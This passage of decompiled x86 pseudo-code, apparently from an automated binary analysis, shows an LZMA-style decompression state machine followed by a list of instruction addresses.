												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                  0x00000000
                  0x00406df4
                  0x00406df4
                  0x00406df8
                  0x00406e1d
                  0x00406e27
                  0x00000000
                  0x00406dfa
                  0x00406dfa
                  0x00406dfd
                  0x00406e01
                  0x00406e04
                  0x00406e07
                  0x00406e0b
                  0x00406e0b
                  0x00406e0e
                  0x00406ee8
                  0x00406ee8
                  0x00406eef
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00406f26
                  0x00406f2a
                  0x00406f8a
                  0x00406f8d
                  0x00406f92
                  0x00406f93
                  0x00406f95
                  0x00406f97
                  0x00406f9a
                  0x00406ea6
                  0x00406ea6
                  0x00406ea6
                  0x00406642
                  0x00406642
                  0x00406642
                  0x0040664b
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00000000
                  0x0040665c
                  0x00000000
                  0x00000000
                  0x00406665
                  0x00406668
                  0x0040666b
                  0x0040666f
                  0x00000000
                  0x00000000
                  0x00406675
                  0x00406678
                  0x0040667a
                  0x0040667b
                  0x0040667e
                  0x00406680
                  0x00406681
                  0x00406683
                  0x00406686
                  0x0040668b
                  0x00406690
                  0x00406699
                  0x004066ac
                  0x004066af
                  0x004066bb
                  0x004066e3
                  0x004066e5
                  0x004066f3
                  0x004066f3
                  0x004066f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066e7
                  0x004066e7
                  0x004066ea
                  0x004066eb
                  0x004066eb
                  0x00000000
                  0x004066e7
                  0x004066c1
                  0x004066c6
                  0x004066c6
                  0x004066cf
                  0x004066d7
                  0x004066da
                  0x00000000
                  0x004066e0
                  0x004066e0
                  0x00000000
                  0x004066e0
                  0x00000000
                  0x004066fd
                  0x004066fd
                  0x00406701
                  0x00406fad
                  0x00000000
                  0x00406fad
                  0x0040670a
                  0x0040671a
                  0x0040671d
                  0x00406720
                  0x00406720
                  0x00406720
                  0x00406723
                  0x00406727
                  0x00000000
                  0x00000000
                  0x00406729
                  0x0040672f
                  0x00406759
                  0x0040675f
                  0x00406766
                  0x00000000
                  0x00406766
                  0x00406735
                  0x00406738
                  0x0040673d
                  0x0040673d
                  0x00406748
                  0x00406750
                  0x00406753
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406798
                  0x0040679e
                  0x004067a1
                  0x004067ae
                  0x004067b6
                  0x00000000
                  0x00000000
                  0x0040676d
                  0x0040676d
                  0x00406771
                  0x00406fbc
                  0x00000000
                  0x00406fbc
                  0x0040677d
                  0x00406788
                  0x00406788
                  0x00406788
                  0x0040678b
                  0x0040678e
                  0x00406791
                  0x00406796
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e7b
                  0x00406e7f
                  0x0040702e
                  0x00000000
                  0x0040702e
                  0x00406e8b
                  0x00406e92
                  0x00406e9a
                  0x00406e9d
                  0x00406ea0
                  0x00406ea0
                  0x00000000
                  0x00000000
                  0x004067be
                  0x004067c0
                  0x004067c3
                  0x00406834
                  0x00406837
                  0x0040683a
                  0x00406841
                  0x0040684b
                  0x00000000
                  0x0040684b
                  0x004067c5
                  0x004067c9
                  0x004067cc
                  0x004067ce
                  0x004067d1
                  0x004067d4
                  0x004067d6
                  0x004067d9
                  0x004067db
                  0x004067e0
                  0x004067e3
                  0x004067e6
                  0x004067ea
                  0x004067f1
                  0x004067f4
                  0x004067fb
                  0x004067ff
                  0x00406807
                  0x00406807
                  0x00406807
                  0x00406801
                  0x00406801
                  0x00406801
                  0x004067f6
                  0x004067f6
                  0x004067f6
                  0x0040680b
                  0x0040680e
                  0x0040682c
                  0x0040682e
                  0x00000000
                  0x00406810
                  0x00406810
                  0x00406813
                  0x00406816
                  0x00406819
                  0x0040681b
                  0x0040681b
                  0x0040681b
                  0x0040681e
                  0x00406821
                  0x00406823
                  0x00406824
                  0x00406827
                  0x00000000
                  0x00406827
                  0x00000000
                  0x00406a5d
                  0x00406a61
                  0x00406a7f
                  0x00406a82
                  0x00406a89
                  0x00406a8c
                  0x00406a8f
                  0x00406a92
                  0x00406a95
                  0x00406a98
                  0x00406a9a
                  0x00406aa1
                  0x00406aa2
                  0x00406aa4
                  0x00406aa7
                  0x00406aaa
                  0x00406aad
                  0x00406aad
                  0x00406ab2
                  0x00000000
                  0x00406ab2
                  0x00406a63
                  0x00406a66
                  0x00406a69
                  0x00406a73
                  0x00000000
                  0x00000000
                  0x00406ac7
                  0x00406acb
                  0x00406aee
                  0x00406af1
                  0x00406af4
                  0x00406afe
                  0x00406acd
                  0x00406acd
                  0x00406ad0
                  0x00406ad3
                  0x00406ad6
                  0x00406ae3
                  0x00406ae6
                  0x00406ae6
                  0x00000000
                  0x00000000
                  0x00406b0a
                  0x00406b0e
                  0x00000000
                  0x00000000
                  0x00406b14
                  0x00406b18
                  0x00000000
                  0x00000000
                  0x00406b1e
                  0x00406b20
                  0x00406b24
                  0x00406b24
                  0x00406b27
                  0x00406b2b
                  0x00000000
                  0x00000000
                  0x00406b7b
                  0x00406b7f
                  0x00406b86
                  0x00406b89
                  0x00406b8c
                  0x00406b96
                  0x00000000
                  0x00406b96
                  0x00406b81
                  0x00000000
                  0x00000000
                  0x00406ba2
                  0x00406ba6
                  0x00406bad
                  0x00406bb0
                  0x00406bb3
                  0x00406ba8
                  0x00406ba8
                  0x00406ba8
                  0x00406bb6
                  0x00406bb9
                  0x00406bbc
                  0x00406bbc
                  0x00406bbf
                  0x00406bc2
                  0x00406bc5
                  0x00406bc5
                  0x00406bc8
                  0x00406bcf
                  0x00406bd4
                  0x00000000
                  0x00000000
                  0x00406c62
                  0x00406c62
                  0x00406c66
                  0x00407004
                  0x00000000
                  0x00407004
                  0x00406c6c
                  0x00406c6f
                  0x00406c72
                  0x00406c76
                  0x00406c79
                  0x00406c7f
                  0x00406c81
                  0x00406c81
                  0x00406c81
                  0x00406c84
                  0x00406c87
                  0x00000000
                  0x00000000
                  0x00406857
                  0x00406857
                  0x0040685b
                  0x00406fc8
                  0x00000000
                  0x00406fc8
                  0x00406861
                  0x00406864
                  0x00406867
                  0x0040686b
                  0x0040686e
                  0x00406874
                  0x00406876
                  0x00406876
                  0x00406876
                  0x00406879
                  0x0040687c
                  0x0040687c
                  0x0040687f
                  0x00406882
                  0x00000000
                  0x00000000
                  0x00406888
                  0x0040688e
                  0x00000000
                  0x00000000
                  0x00406894
                  0x00406894
                  0x00406898
                  0x0040689b
                  0x0040689e
                  0x004068a1
                  0x004068a4
                  0x004068a5
                  0x004068a8
                  0x004068aa
                  0x004068b0
                  0x004068b3
                  0x004068b6
                  0x004068b9
                  0x004068bc
                  0x004068bf
                  0x004068c2
                  0x004068de
                  0x004068e1
                  0x004068e4
                  0x004068e7
                  0x004068ee
                  0x004068f2
                  0x004068f4
                  0x004068f8
                  0x004068c4
                  0x004068c4
                  0x004068c8
                  0x004068d0
                  0x004068d5
                  0x004068d7
                  0x004068d9
                  0x004068d9
                  0x004068fb
                  0x00406902
                  0x00406905
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x00406910
                  0x00406910
                  0x00406914
                  0x00406fd4
                  0x00000000
                  0x00406fd4
                  0x0040691a
                  0x0040691d
                  0x00406920
                  0x00406924
                  0x00406927
                  0x0040692d
                  0x0040692f
                  0x0040692f
                  0x0040692f
                  0x00406932
                  0x00406935
                  0x00406935
                  0x00406935
                  0x0040693b
                  0x00000000
                  0x00000000
                  0x0040693d
                  0x00406940
                  0x00406943
                  0x00406946
                  0x00406949
                  0x0040694c
                  0x0040694f
                  0x00406952
                  0x00406955
                  0x00406958
                  0x0040695b
                  0x00406973
                  0x00406976
                  0x00406979
                  0x0040697c
                  0x0040697c
                  0x0040697f
                  0x00406983
                  0x00406985
                  0x0040695d
                  0x0040695d
                  0x00406965
                  0x0040696a
                  0x0040696c
                  0x0040696e
                  0x0040696e
                  0x00406988
                  0x0040698f
